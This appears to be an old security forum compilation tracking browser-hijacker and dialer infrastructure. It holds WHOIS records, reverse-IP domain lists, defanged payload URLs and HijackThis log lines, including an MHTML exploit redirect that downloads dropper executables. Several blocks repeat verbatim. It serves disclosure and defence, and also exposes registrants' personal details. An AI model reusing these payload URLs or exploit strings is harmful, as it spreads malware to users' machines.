your-web-search.com
IP Addresses: 205.209.134.221
IP Country: UNITED STATES
Reverse IP Lookup: IP hosts 12 domains
Hosting Company Name:
ICANN Registrar: DIRECT INFORMATION PVT. LTD., DBA DIRECTI.COM
Creation Date: Oct 19 2004
Expiry Date: Oct 19 2007
Web Server: N/A
Website Status:
Registration Service Provided By: ESTDOMAINS
Contact:
Website: http://www.estdomains.com
Abuse Desk Email Address:
Domain Name: YOUR-WEB-SEARCH.COM
Registrant:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266
Creation Date: 19-Oct-2004
Expiration Date: 19-Oct-2007
Domain servers in listed order:
ns.hostpoints.net
nss.hostpoints.net
Administrative Contact:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266
Technical Contact:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266
Billing Contact:
Gurin and K
Andrew Gurin ()
Bavarsky 9/15
Kharkov
null,61039
UA
Tel. +380.572287266
Status:ACTIVE
205.209.134.221 - IP hosts 12 Total Domains ...
Showing 1 - 12 out of 12
Domain Name
1 ANDYS-COLLECTION.COM.
2 COOL-TGP.COM.
3 DIRTY-GAMES.NET.
4 DRUGSCATALOGUE.COM.
5 boring-ARTS-SHOP.COM.
6 PHOTOBYAG.COM.
7 PORTRAIT-FROM-PHOTO.COM.
8 PRIVATEPASSION.NET.
9 REAL-AMATEURS-FOR-FREE.COM.
10 SEXYRUSSIANGIRLS.NET.
11 TOP-AMATEUR-LINKS.NET.
12 YOUR-WEB-SEARCH.COM.
Full Version: - BROWSER / INTERNET HIJACKERS -
makemesearch.com
IP Addresses: 195.225.177.9
IP Country: UKRAINE
Reverse IP Lookup: IP hosts 5 domains
Hosting Company Name:
ICANN Registrar: DIRECT INFORMATION PVT. LTD., DBA DIRECTI.COM
Creation Date: Aug 6 2004
Expiry Date: Aug 6 2005
Web Server: N/A
Website Status:
Registration Service Provided By: ESTDOMAINS
Contact:
Website: http://www.estdomains.com
Abuse Desk Email Address:
Domain Name: MAKEMESEARCH.COM
Registrant:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Creation Date: 06-Aug-2004
Expiration Date: 06-Aug-2005
Domain servers in listed order:
ns1.makemesearch.com
ns2.makemesearch.com
Administrative Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Technical Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Billing Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Status:ACTIVE
195.225.177.9 - IP hosts 5 Total Domains ...
Showing 1 - 5 out of 5
Domain Name
1 MAKEMESEARCH.COM.
2 MAKEUSSEARCH.COM.
3 TOOLBARPLACE.COM.
4 TOPSITEHQ.COM.
5 YOPSEARCH.COM.
IP Addresses: 195.225.177.9
IP Country: UKRAINE
Reverse IP Lookup: IP hosts 5 domains
Hosting Company Name:
ICANN Registrar: DIRECT INFORMATION PVT. LTD., DBA DIRECTI.COM
Creation Date: Aug 6 2004
Expiry Date: Aug 6 2005
Web Server: N/A
Website Status:
Registration Service Provided By: ESTDOMAINS
Contact:
Website: http://www.estdomains.com
Abuse Desk Email Address:
Domain Name: MAKEMESEARCH.COM
Registrant:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Creation Date: 06-Aug-2004
Expiration Date: 06-Aug-2005
Domain servers in listed order:
ns1.makemesearch.com
ns2.makemesearch.com
Administrative Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Technical Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Billing Contact:
MakeMeSearch
Alex ()
Buhalis avenue 11
Paris
null,85521
FR
Tel. +78.456789456111
Status:ACTIVE
195.225.177.9 - IP hosts 5 Total Domains ...
Showing 1 - 5 out of 5
Domain Name
1 MAKEMESEARCH.COM.
2 MAKEUSSEARCH.COM.
3 TOOLBARPLACE.COM.
4 TOPSITEHQ.COM.
5 YOPSEARCH.COM.
356563.NET
356563.NET:209.66.121.9-209.66.121.9
Server Type: Apache/1.3.31 (Unix) PHP/4.3.8
IP Address: 209.66.121.9
IP Location: - Poltavs'ka Oblast' - Poltava - Aps Communications
Name Server: NS1.008I.COM NS2.008I.COM
Registration Service Provided By: ESTDOMAINS
Domain Name: 356563.NET
Registrant:
None
Pavel Petroff
PO BOX 2176
c/o Pint spb N20
Slough PDO
,SL3 0PE
GB
Tel. +7.5017000206
Creation Date: 22-Jan-2004
Expiration Date: 22-Jan-2006
Domain servers in listed order:
ns1.008i.com
ns2.008i.com
356563.NET:209.66.121.9-209.66.121.9
Server Type: Apache/1.3.31 (Unix) PHP/4.3.8
IP Address: 209.66.121.9
IP Location: - Poltavs'ka Oblast' - Poltava - Aps Communications
Name Server: NS1.008I.COM NS2.008I.COM
Registration Service Provided By: ESTDOMAINS
Domain Name: 356563.NET
Registrant:
None
Pavel Petroff
PO BOX 2176
c/o Pint spb N20
Slough PDO
,SL3 0PE
GB
Tel. +7.5017000206
Creation Date: 22-Jan-2004
Expiration Date: 22-Jan-2006
Domain servers in listed order:
ns1.008i.com
ns2.008i.com
AWMDIALER.COM
AWMDIALER.COM:209.66.121.17-209.66.121.17
http://www.whois.sc/awmdialer.com
Server Type: Apache/1.3.28 (Unix) PHP/5.0.1
IP Address: 209.66.121.17
IP Location: - Poltavs'ka Oblast' - Poltava - Aps Communications
APS COMMUNICATIONS:209.66.121.0-209.66.121.255
Name Server: NS1.CMKHOST.COM NS2.CMKHOST.COM
ICANN Registrar: BULKREGISTER, LLC.
Created: 11-aug-2003
Expires: 11-aug-2005
Status: ACTIVE
AWM Solutions AG
Goldbekplatz 3
Hamburg, 20303
DE
Domain Name: AWMDIALER.COM
Administrative Contact:
Claus Rogge
AWM Solutions AG
Goldbekplatz 3
Hamburg, 20303
DE
Phone: email only
Record updated on 2004-07-05 05:41:50
Record created on 2003-08-11
Record expires on 2005-08-11
Domain servers in listed order:
NS1.CMKHOST.COM 209.66.121.15
NS2.CMKHOST.COM 209.66.121.25
TransferGuard LOCK Status => ENABLED
AWMDIALER.COM:209.66.121.17-209.66.121.17
http://www.whois.sc/awmdialer.com
Server Type: Apache/1.3.28 (Unix) PHP/5.0.1
IP Address: 209.66.121.17
IP Location: - Poltavs'ka Oblast' - Poltava - Aps Communications
APS COMMUNICATIONS:209.66.121.0-209.66.121.255
Name Server: NS1.CMKHOST.COM NS2.CMKHOST.COM
ICANN Registrar: BULKREGISTER, LLC.
Created: 11-aug-2003
Expires: 11-aug-2005
Status: ACTIVE
AWM Solutions AG
Goldbekplatz 3
Hamburg, 20303
DE
Domain Name: AWMDIALER.COM
Administrative Contact:
Claus Rogge
AWM Solutions AG
Goldbekplatz 3
Hamburg, 20303
DE
Phone: email only
Record updated on 2004-07-05 05:41:50
Record created on 2003-08-11
Record expires on 2005-08-11
Domain servers in listed order:
NS1.CMKHOST.COM 209.66.121.15
NS2.CMKHOST.COM 209.66.121.25
TransferGuard LOCK Status => ENABLED
http://www.webhelper4u.com/CWS/CWSdropper_exe.html
========================================
hxxp://www.hotoffers.info
69.50.173.3
www.hotoffers.info
http://www.whois.sc/69.50.173.3
www.Allaboutvirgins.com
www.Allxxxteen.com
www.Enlargeyourpockets.com
www.Freeandexclusive.com
www.Fullhqgalleries.com
www.Hotoffers.info
www.Lust-mature.com
www.Teens-dreams.net
www.Wearehosters.com
---------------------
hxxp://antispy.globolook.com
69.50.173.4
antispy.globolook.com
www.Globolook.com
www.Pshik.com
http://www.whois.sc/69.50.173.4
69.50.173.0 - 69.50.173.31
Mohamed Ayyad
Registrant:
Geo
123 Street
Moscow
RU,121443
RU
Tel. +7.4158875
Creation Date: 10-Nov-2004
Expiration Date: 10-Nov-2005
Domain servers in listed order:
ns1.wearehosters.com
ns2.wearehosters.com
Domain Name: PSHIK.COM
Registrant:
1
bagzic ()
Pervomaiskaya
Moscow
null,120097
RU
Tel. +8.901454567
Creation Date: 14-Jun-2004
Expiration Date: 14-Jun-2005
Domain servers in listed order:
ns1.wearehosters.com
ns2.wearehosters.com
------------------------
39.dapfeed.com/X.exe (IP: 65.75.191.240)
www.Dapfeed.com
65.75.191.240
39.dapfeed.com
65.75.128.0 - 65.75.191.255
Managed Solutions Group, Inc
Domain Name: DAPFEED.COM
Registrant:
Foton
Johan ()
Albrechtstrasse, 26
Berlin
null,10117
DE
Tel. +030.288870
Fax. +030.28887163
Creation Date: 02-Feb-2005
Expiration Date: 02-Feb-2006
Domain servers in listed order:
24572.mercury.orderbox-dns.com
24572.venus.orderbox-dns.com
======================================
hxxp://82.179.166.69/
82.179.160.0 - 82.179.175.255
ICS TM, JSC
70 Bolshoy pr. V.O.
199002 St.-Petersburg
Russian Federation
=============================================
69.50.191.68
24-7-search.com
69.50.160.0 - 69.50.191.255
Atrivo
http://www.whois.sc/24-7-search.com
Domain Name: 24-7-SEARCH.COM
Registrant:
Pizdataya Compania Inc.
Vasiliy Pupklindtovich ()
Grlrznih Drovosekov 15
Urupinsk
null,195156
CC
Tel. +91.4896785423
Creation Date: 13-Nov-2004
Expiration Date: 13-Nov-2005
Domain servers in listed order:
ns1.xpehbam.biz
ns2.xpehbam.biz
OrgName: Atrivo
OrgID: ATRIV
Address: 200 Paul Avenue
City: San Francisco
StateProv: CA
PostalCode: 94124
Country: US
NetRange: 69.50.160.0 - 69.50.191.255
CIDR: 69.50.160.0/19
NetName: ATRIVOTECHNOLOGIES
NetHandle: NET-69-50-160-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: MAIL.ATRIVO.COM
NameServer: PAVEL.ATRIVO.COM
==============================================================
t34rulit.com
IP Address: 69.31.85.148 (ARIN & RIPE IP search)
IP Location: - New York - New York - Pilosoft Inc
http://www.whois.sc/69.31.85.148
http://www.whois.sc/t34rulit.com
nLayer Communications, Inc. NLYR-ARIN-BLK2 (NET-69-31-0-0-1)
69.31.0.0 - 69.31.143.255
Pilosoft, Inc. NLYR-69-31-80-0-1 (NET-69-31-80-0-1)
69.31.80.0 - 69.31.87.255
Registrant:
none
na Prikope 16
Praha, PG 16300
CZ
723101427
Domain Name: T34RULIT.COM
Administrative Contact:
Magel, Irgi
na Prikope 16
Praha, PG 16300
CZ
723101427
Record expires on 11-12-2005
Record created on 11-12-2003
Domain servers in listed order:
NS0.DIRECTNIC.COM 204.251.10.100
NS1.DIRECTNIC.COM 206.251.177.2
===================================================
========================================
hxxp://www.hotoffers.info
69.50.173.3
www.hotoffers.info
http://www.whois.sc/69.50.173.3
www.Allaboutvirgins.com
www.Allxxxteen.com
www.Enlargeyourpockets.com
www.Freeandexclusive.com
www.Fullhqgalleries.com
www.Hotoffers.info
www.Lust-mature.com
www.Teens-dreams.net
www.Wearehosters.com
---------------------
hxxp://antispy.globolook.com
69.50.173.4
antispy.globolook.com
www.Globolook.com
www.Pshik.com
http://www.whois.sc/69.50.173.4
69.50.173.0 - 69.50.173.31
Mohamed Ayyad
Registrant:
Geo
123 Street
Moscow
RU,121443
RU
Tel. +7.4158875
Creation Date: 10-Nov-2004
Expiration Date: 10-Nov-2005
Domain servers in listed order:
ns1.wearehosters.com
ns2.wearehosters.com
Domain Name: PSHIK.COM
Registrant:
1
bagzic ()
Pervomaiskaya
Moscow
null,120097
RU
Tel. +8.901454567
Creation Date: 14-Jun-2004
Expiration Date: 14-Jun-2005
Domain servers in listed order:
ns1.wearehosters.com
ns2.wearehosters.com
------------------------
39.dapfeed.com/X.exe (IP: 65.75.191.240)
www.Dapfeed.com
65.75.191.240
39.dapfeed.com
65.75.128.0 - 65.75.191.255
Managed Solutions Group, Inc
Domain Name: DAPFEED.COM
Registrant:
Foton
Johan ()
Albrechtstrasse, 26
Berlin
null,10117
DE
Tel. +030.288870
Fax. +030.28887163
Creation Date: 02-Feb-2005
Expiration Date: 02-Feb-2006
Domain servers in listed order:
24572.mercury.orderbox-dns.com
24572.venus.orderbox-dns.com
======================================
hxxp://82.179.166.69/
82.179.160.0 - 82.179.175.255
ICS TM, JSC
70 Bolshoy pr. V.O.
199002 St.-Petersburg
Russian Federation
=============================================
69.50.191.68
24-7-search.com
69.50.160.0 - 69.50.191.255
Atrivo
http://www.whois.sc/24-7-search.com
Domain Name: 24-7-SEARCH.COM
Registrant:
Pizdataya Compania Inc.
Vasiliy Pupklindtovich ()
Grlrznih Drovosekov 15
Urupinsk
null,195156
CC
Tel. +91.4896785423
Creation Date: 13-Nov-2004
Expiration Date: 13-Nov-2005
Domain servers in listed order:
ns1.xpehbam.biz
ns2.xpehbam.biz
OrgName: Atrivo
OrgID: ATRIV
Address: 200 Paul Avenue
City: San Francisco
StateProv: CA
PostalCode: 94124
Country: US
NetRange: 69.50.160.0 - 69.50.191.255
CIDR: 69.50.160.0/19
NetName: ATRIVOTECHNOLOGIES
NetHandle: NET-69-50-160-0-1
Parent: NET-69-0-0-0-0
NetType: Direct Allocation
NameServer: MAIL.ATRIVO.COM
NameServer: PAVEL.ATRIVO.COM
==============================================================
t34rulit.com
IP Address: 69.31.85.148 (ARIN & RIPE IP search)
IP Location: - New York - New York - Pilosoft Inc
http://www.whois.sc/69.31.85.148
http://www.whois.sc/t34rulit.com
nLayer Communications, Inc. NLYR-ARIN-BLK2 (NET-69-31-0-0-1)
69.31.0.0 - 69.31.143.255
Pilosoft, Inc. NLYR-69-31-80-0-1 (NET-69-31-80-0-1)
69.31.80.0 - 69.31.87.255
Registrant:
none
na Prikope 16
Praha, PG 16300
CZ
723101427
Domain Name: T34RULIT.COM
Administrative Contact:
Magel, Irgi
na Prikope 16
Praha, PG 16300
CZ
723101427
Record expires on 11-12-2005
Record created on 11-12-2003
Domain servers in listed order:
NS0.DIRECTNIC.COM 204.251.10.100
NS1.DIRECTNIC.COM 206.251.177.2
===================================================
DEDIALER.COM / MHTMLRedir.Exploit
Dedialer.com:205.252.161.237-205.252.161.237
MHTMLRedir.Exploit:205.252.161.238-205.252.161.238
Hijacker exe filenames used are according to geographic location :
rdgAU1861.exe
rdgDE1393.exe
RDGPH1342.EXE
rdgUS1391.exe
hxxp:// 205.252.161.238 /iex/doit.cgi?s=1753350144&xdat=&url=hxxp://205.252.161.238:80/rdgAU1861.exe
REQUEST ARG REFERER hxxp://205.252.161.238/connect.cgi?id=xxxx
dedialer.com
205.252.161.237
MHTMLRedir.Exploit
205.252.161.238
www.Dedialer.com
http://www.whois.sc/dedialer.com
www.Highdialer.com
http://www.whois.sc/highdialer.com
205.252.0.0 - 205.252.255.255
Beyond The Network America, Inc
Domain Name: DEDIALER.COM
Registrant:
olga icn
marco
Kirchgasse 5
Kloten
ch,8302
CH
Tel. +23.222341
Creation Date: 11-May-2004
Expiration Date: 11-May-2005
Domain servers in listed order:
ns1.advancedhosters.com
ns2.advancedhosters.com
Domain Name: HIGHDIALER.COM
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias ()
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660
Creation Date: 12-Feb-2005
Expiration Date: 12-Feb-2006
Domain servers in listed order:
ns1.advancedhosters.com
ns2.advancedhosters.com
-----------------------------
Other Evidence:
-----------------------------
http://www.trojaner-board.de/showthread.php?t=8932
O16 - DPF: {11111111-1111-1111-1111-111111111111} -
mhtml : file : //C : NXSFT.MHT ! hxxp ://205.252.161.238:80/iex/ofile.exe?url= hxxp://205.252.161.238:80/rdgDE1393.exe
O16 - DPF: {11111111-1111-1111-1111-111111113457} - file://c:\ied_s7m.cab
O16 - DPF: {11111111-1111-1111-1111-511111113457} - file://c:\x.cab
O16 - DPF: {11111111-1111-1111-1111-511111113458} - file://c:\x.cab
O21 - SSODL: SystemCheck - {54645654-2225-4455-44A1-9F4543D34544} - C:\WINDOWS\System32\vbsys.dll
vbsys.dll
http://it.trendmicro-europe.com/consumer/s...me=HTML_ADERS.A
###############################################
Part of a very large infected log here :
http://www.trojaner-board.de/showthread.php?t=9479
O16 - DPF: {3277B58E-B431-3A3A-2503-253F53BF53CD} - hxxp://205.252.161.238/1/rdgUS1391.exe
##################################################
Dedialer.com:205.252.161.237-205.252.161.237
MHTMLRedir.Exploit:205.252.161.238-205.252.161.238
Hijacker exe filenames used are according to geographic location :
rdgAU1861.exe
rdgDE1393.exe
RDGPH1342.EXE
rdgUS1391.exe
hxxp:// 205.252.161.238 /iex/doit.cgi?s=1753350144&xdat=&url=hxxp://205.252.161.238:80/rdgAU1861.exe
REQUEST ARG REFERER hxxp://205.252.161.238/connect.cgi?id=xxxx
dedialer.com
205.252.161.237
MHTMLRedir.Exploit
205.252.161.238
www.Dedialer.com
http://www.whois.sc/dedialer.com
www.Highdialer.com
http://www.whois.sc/highdialer.com
205.252.0.0 - 205.252.255.255
Beyond The Network America, Inc
Domain Name: DEDIALER.COM
Registrant:
olga icn
marco
Kirchgasse 5
Kloten
ch,8302
CH
Tel. +23.222341
Creation Date: 11-May-2004
Expiration Date: 11-May-2005
Domain servers in listed order:
ns1.advancedhosters.com
ns2.advancedhosters.com
Domain Name: HIGHDIALER.COM
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias ()
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660
Creation Date: 12-Feb-2005
Expiration Date: 12-Feb-2006
Domain servers in listed order:
ns1.advancedhosters.com
ns2.advancedhosters.com
-----------------------------
Other Evidence:
-----------------------------
http://www.trojaner-board.de/showthread.php?t=8932
O16 - DPF: {11111111-1111-1111-1111-111111111111} -
mhtml : file : //C : NXSFT.MHT ! hxxp ://205.252.161.238:80/iex/ofile.exe?url= hxxp://205.252.161.238:80/rdgDE1393.exe
O16 - DPF: {11111111-1111-1111-1111-111111113457} - file://c:\ied_s7m.cab
O16 - DPF: {11111111-1111-1111-1111-511111113457} - file://c:\x.cab
O16 - DPF: {11111111-1111-1111-1111-511111113458} - file://c:\x.cab
O21 - SSODL: SystemCheck - {54645654-2225-4455-44A1-9F4543D34544} - C:\WINDOWS\System32\vbsys.dll
vbsys.dll
http://it.trendmicro-europe.com/consumer/s...me=HTML_ADERS.A
QUOTE
This malicious HTML is a dropper program that upon execution downloads the file RDGPH1342.EXE from the following website:
http://63.<BLOCKED>.178.91/1/
It creates the following Registry key:
HKEY_CLASSES_ROOT\CLSID\
{54645654-2225-4455-44A1-9F4543D34544}
http://63.<BLOCKED>.178.91/1/
It creates the following Registry key:
HKEY_CLASSES_ROOT\CLSID\
{54645654-2225-4455-44A1-9F4543D34544}
QUOTE
File C:\hello.exe infected by "TrojanDownloader.Win32.Small.xa" Virus
File C:\ied_s7m.cab infected by "TrojanDownloader.Win32.Mediket.a" Virus.
File C:\Programme\AVPersonal\INFECTED\XWXLOAD.EXE.VIR infected by "TrojanDownloader.Win32.Small.fo" Virus.
File C:\WINDOWS\Downloaded Program Files\CONFLICT.1\loader.exe infected by "TrojanDownloader.Win32.Small.xa" Virus.
File C:\WINDOWS\Downloaded Program Files\loader.exe infected by "TrojanDownloader.Win32.Small.xa" Virus. .
File C:\ied_s7m.cab infected by "TrojanDownloader.Win32.Mediket.a" Virus.
File C:\Programme\AVPersonal\INFECTED\XWXLOAD.EXE.VIR infected by "TrojanDownloader.Win32.Small.fo" Virus.
File C:\WINDOWS\Downloaded Program Files\CONFLICT.1\loader.exe infected by "TrojanDownloader.Win32.Small.xa" Virus.
File C:\WINDOWS\Downloaded Program Files\loader.exe infected by "TrojanDownloader.Win32.Small.xa" Virus. .
###############################################
Part of a very large infected log here :
http://www.trojaner-board.de/showthread.php?t=9479
O16 - DPF: {3277B58E-B431-3A3A-2503-253F53BF53CD} - hxxp://205.252.161.238/1/rdgUS1391.exe
##################################################
check-wire.com:195.225.177.21-195.225.177.21
195.225.177.21
check-wire.com
195.225.176.0 - 195.225.179.255
NetcatHosting
Ukraine
http://www.whois.sc/check-wire.com
www.Check-wire.com
Domain Name: CHECK-WIRE.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 16-Jun-2004
Expiration Date: 16-Jun-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------
Reverse IP: Web server hosts 14 websites
www.2awm.com
www.4count.com
www.Awmgate.com
www.Awmnet.com
www.Check-wire.com
www.Find-by-web.com
www.Getnewfriend.com
www.Japonka.com
www.Lab-wire.com
www.Nastygirlssearch.com
www.Online-more.com
www.Search4www.com
www.Tiptopsearch.com
www.Icountertop.com
-----------------------------------------
www.2awm.com
Domain Name: 2AWM.COM
Registrant:
Somjet, inc
Adam Oker
Jungmannova 31
Prague 1
null,11000
CZ
Tel. +42.022449435
Creation Date: 24-Oct-2003
Expiration Date: 24-Oct-2005
-----------------------------------------
www.4count.com
Website Title: DETECTIVE Searcher
Domain Name: 4COUNT.COM
Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005
Domain servers in listed order:
ns1.4count.com
ns2.4count.com
-----------------------------------------
www.Awmgate.com
Website Title: AWM Gate Inc. presents.
Domain Name: AWMGATE.COM
Registrant:
N/A
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 28-Jul-2004
Expiration Date: 28-Jul-2005
---------------------------------------------
www.Awmnet.com
Domain Name: AWMNET.COM
Registrant:
Michel Lemercier
15 rue aristide Briand
CENON
null,33150
FR
Tel. +33.557541216
Creation Date: 13-Oct-2004
Expiration Date: 13-Oct-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Find-by-web.com
Website Title: Find-by-Web.com
Domain Name: FIND-BY-WEB.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE GB
Tel. +0.1278751107
Creation Date: 29-Aug-2004
Expiration Date: 29-Aug-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Getnewfriend.com
Domain Name: GETNEWFRIEND.COM
Registrant:
olga icn
marco
Kirchgasse 5
Kloten
ch,8302
CH
Tel. +23.222341
Creation Date: 03-Jan-2005
Expiration Date: 03-Jan-2007
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Japonka.com
Domain Name: JAPONKA.COM
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660
Creation Date: 03-Nov-2004
Expiration Date: 03-Nov-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Lab-wire.com
Domain Name: LAB-WIRE.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 16-Jun-2004
Expiration Date: 16-Jun-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Nastygirlssearch.com
Website Title: DETECTIVE Searcher
Domain Name: NASTYGIRLSSEARCH.COM
Registrant:
Solar
Andre
Rome
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 07-Dec-2004
Expiration Date: 06-Dec-2005
Domain servers in listed order:
ns1.nastygirlssearch.com
ns2.nastygirlssearch.com
-----------------------------------------------
www.Online-more.com
Domain Name: ONLINE-MORE.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 11-Jun-2004
Expiration Date: 11-Jun-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Search4www.com
Website Title: Check-Wire.com
Domain Name: SEARCH4WWW.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 29-Aug-2004
Expiration Date: 29-Aug-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Tiptopsearch.com
Domain Name: TIPTOPSEARCH.COM
Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005
Domain servers in listed order:
ns1.4count.com
ns2.4count.com
-----------------------------------------------
www.Icountertop.com
Website Title: DETECTIVE Searcher
Domain Name: ICOUNTERTOP.COM
Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005
Domain servers in listed order:
ns1.4count.com
ns2.4count.com
-----------------------------------------------
195.225.177.21
check-wire.com
195.225.176.0 - 195.225.179.255
NetcatHosting
Ukraine
http://www.whois.sc/check-wire.com
www.Check-wire.com
Domain Name: CHECK-WIRE.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 16-Jun-2004
Expiration Date: 16-Jun-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------
Reverse IP: Web server hosts 14 websites
www.2awm.com
www.4count.com
www.Awmgate.com
www.Awmnet.com
www.Check-wire.com
www.Find-by-web.com
www.Getnewfriend.com
www.Japonka.com
www.Lab-wire.com
www.Nastygirlssearch.com
www.Online-more.com
www.Search4www.com
www.Tiptopsearch.com
www.Icountertop.com
-----------------------------------------
www.2awm.com
Domain Name: 2AWM.COM
Registrant:
Somjet, inc
Adam Oker
Jungmannova 31
Prague 1
null,11000
CZ
Tel. +42.022449435
Creation Date: 24-Oct-2003
Expiration Date: 24-Oct-2005
-----------------------------------------
www.4count.com
Website Title: DETECTIVE Searcher
Domain Name: 4COUNT.COM
Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005
Domain servers in listed order:
ns1.4count.com
ns2.4count.com
-----------------------------------------
www.Awmgate.com
Website Title: AWM Gate Inc. presents.
Domain Name: AWMGATE.COM
Registrant:
N/A
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 28-Jul-2004
Expiration Date: 28-Jul-2005
---------------------------------------------
www.Awmnet.com
Domain Name: AWMNET.COM
Registrant:
Michel Lemercier
15 rue aristide Briand
CENON
null,33150
FR
Tel. +33.557541216
Creation Date: 13-Oct-2004
Expiration Date: 13-Oct-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Find-by-web.com
Website Title: Find-by-Web.com
Domain Name: FIND-BY-WEB.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE GB
Tel. +0.1278751107
Creation Date: 29-Aug-2004
Expiration Date: 29-Aug-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Getnewfriend.com
Domain Name: GETNEWFRIEND.COM
Registrant:
olga icn
marco
Kirchgasse 5
Kloten
ch,8302
CH
Tel. +23.222341
Creation Date: 03-Jan-2005
Expiration Date: 03-Jan-2007
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Japonka.com
Domain Name: JAPONKA.COM
Registrant:
HAYTER MERCHANTS INC.
Gaspar Santimateo Brias
Jasmine Court, 35A Regent Street,POBox 1777
Belize City
null,NA
BZ
Tel. +420.775688660
Creation Date: 03-Nov-2004
Expiration Date: 03-Nov-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Lab-wire.com
Domain Name: LAB-WIRE.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 16-Jun-2004
Expiration Date: 16-Jun-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Nastygirlssearch.com
Website Title: DETECTIVE Searcher
Domain Name: NASTYGIRLSSEARCH.COM
Registrant:
Solar
Andre
Rome
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 07-Dec-2004
Expiration Date: 06-Dec-2005
Domain servers in listed order:
ns1.nastygirlssearch.com
ns2.nastygirlssearch.com
-----------------------------------------------
www.Online-more.com
Domain Name: ONLINE-MORE.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 11-Jun-2004
Expiration Date: 11-Jun-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Search4www.com
Website Title: Check-Wire.com
Domain Name: SEARCH4WWW.COM
Registrant:
Levi Phillips
Sunny Corner,South Road
Brean, Somerset
null,TA82SE
GB
Tel. +0.1278751107
Creation Date: 29-Aug-2004
Expiration Date: 29-Aug-2005
Domain servers in listed order:
ns1.online-more.com
ns2.online-more.com
-----------------------------------------------
www.Tiptopsearch.com
Domain Name: TIPTOPSEARCH.COM
Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005
Domain servers in listed order:
ns1.4count.com
ns2.4count.com
-----------------------------------------------
www.Icountertop.com
Website Title: DETECTIVE Searcher
Domain Name: ICOUNTERTOP.COM
Registrant:
Solar
Andre
Rome
null,00187
IT
Tel. +39.0623784534
Creation Date: 26-Nov-2004
Expiration Date: 25-Nov-2005
